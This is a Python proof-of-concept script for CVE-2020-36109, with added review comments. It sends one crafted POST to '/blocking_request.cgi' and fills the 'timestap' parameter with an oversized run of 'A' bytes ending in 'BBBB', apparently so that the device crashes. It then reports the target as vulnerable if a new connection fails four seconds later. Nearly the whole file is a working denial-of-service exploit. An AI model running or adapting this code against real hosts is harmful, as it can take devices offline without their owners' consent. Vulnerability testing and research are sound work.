#!/usr/bin/env python
"""Proof-of-concept checker for CVE-2020-36109.

Sends one crafted POST to ``/blocking_request.cgi`` on the given host, hex-dumps
the request and any response, then sleeps 4 s and tries to open a fresh TCP
connection: a failed connect is reported as "vulnerable", a successful one as
"not vulnerable".

Usage: ``python3 <this script> HOST [PORT]`` (PORT defaults to 80).
Requires the third-party ``hexdump`` package.
"""
import socket
import sys
import time
import hexdump

CVE = "CVE-2020-36109"
# Defaults only; both are overwritten from argv below (at import time) and are
# read by header() when it is called, not when it is defined.
HOST = "127.0.0.1"
PORT = 80


def recvuntil(s: socket.socket, timeout: float = 5) -> tuple[bool, str]:
    """Read from *s* until the peer closes the connection or a recv() times out.

    Args:
        s: connected TCP socket.
        timeout: per-recv() timeout in seconds, applied with settimeout().

    Returns:
        ``(done, data)``: *data* is everything received, decoded as UTF-8 chunk
        by chunk; *done* is True only if *data* ends with the terminator built
        below, which evaluates to ``"\\r\\n\\n\\r\\n\\r\\n"``.

    Raises:
        Only ``socket.timeout`` is swallowed; any other socket error propagates.
    """
    check_lst = ["", "\x0a", ""]
    check_str = "{}\x0d\x0a".format("\x0d\x0a".join(check_lst))
    data = ''
    tmp_data = '1'  # non-empty sentinel so the loop body runs at least once
    try:
        while tmp_data != '':  # recv() returns '' once the peer closes
            s.settimeout(timeout)
            # NOTE(review): decoding each chunk separately raises
            # UnicodeDecodeError if a multi-byte UTF-8 sequence is split
            # across two recv() calls.
            tmp_data = s.recv(1024 * 8).decode('utf-8')
            data += tmp_data
    except socket.timeout:
        pass  # a timeout ends the read; whatever arrived so far is returned
    done = True if data.endswith(check_str) else False
    return done, data


def header() -> str:
    """Return the request line and fixed headers of the POST, without body or
    Content-Length. Host, Referer and Origin use the module-level HOST/PORT as
    set from argv."""
    buff = ""
    buff += "POST /blocking_request.cgi HTTP/1.1\r\n"
    buff += "Host: {}:{}\r\n".format(HOST, PORT)
    buff += "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    buff += "Accept: */*\r\n"
    buff += "Accept-Language: en-US,en;q=0.5\r\n"
    buff += "Accept-Encoding: gzip, deflate\r\n"
    buff += "Connection: keep-alive\r\n"
    buff += "Referer: http://{}:{}/\r\n".format(HOST, PORT)
    buff += "Sec-GPC: 1\r\n"
    buff += "Origin: http://{}:{}\r\n".format(HOST, PORT)
    buff += "Pragma: no-cache\r\n"
    buff += "Cache-Control: no-cache\r\n"
    return buff


def dos() -> str:
    """Return the complete request string that main() sends.

    The body is a form-encoded string whose ``timestap`` field holds the
    current time + 3605 s, an encoded newline, 0x1000-0xc-1 (4083) 'A' bytes
    and "BBBB" — i.e. an oversized value for that parameter. Content-Length is
    computed from the assembled body.
    """
    buff = header()
    mac = "mac=%00"
    timestap = "timestap={}".format(int(time.time()) + 3600 + 5) + "%0a" + "A" * (0x1000 - 0xc - 1) + "BBBB"
    buff1 = "interval=0&CName=whatever&" + timestap + "&" + mac
    buff += "Content-Length: {}\r\n".format(len(buff1))
    buff += "\r\n"
    buff += buff1
    return buff


# Command-line handling runs at import time, before the main block.
# NOTE(review): sys.argv[1] is read unguarded, so running with no arguments
# raises IndexError instead of printing the usage line.
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
    print("# Example usage: 'python3 {} '\n".format(sys.argv[0]))
    sys.exit(0)
HOST = sys.argv[1]
PORT = 80
if len(sys.argv) > 2:
    PORT = int(sys.argv[2])

if __name__ == "__main__":
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    buff = dos().encode('utf-8')
    hexdump0 = hexdump.hexdump(buff, result='return')
    print("[-] Sending:")
    # Only the first 2233 and last 226 characters of the dump are printed;
    # presumably to elide the repeated 'A' run in the middle of the body.
    print("{}{}{}".format(hexdump0[:2233], " ... : .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ... \n", hexdump0[-226:]))
    # NOTE(review): send() is not guaranteed to transmit the whole buffer, and
    # the socket is never closed explicitly.
    s.send(buff)
    done, body = recvuntil(s)
    if done:
        hexdump0 = hexdump.hexdump(body.encode('utf-8'), result='return')
        print("\n[-] Recieving:")
        print(hexdump0)
        # Verdict: the target is reported vulnerable iff a new TCP connection
        # to HOST:PORT fails with socket.error 4 s after the request.
        try:
            time.sleep(4)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            print("[x] Good, target isn't vulnerable to {}".format(CVE))
        except socket.error:
            print("[+] Target is vulnerable to {}".format(CVE))
        print("[+] DONE")
    else:
        # Reached when the response did not end with recvuntil()'s terminator
        # (or nothing was received before the timeout).
        print("[X] Sems that target isn't doing the '/blocking_request.cgi' action right")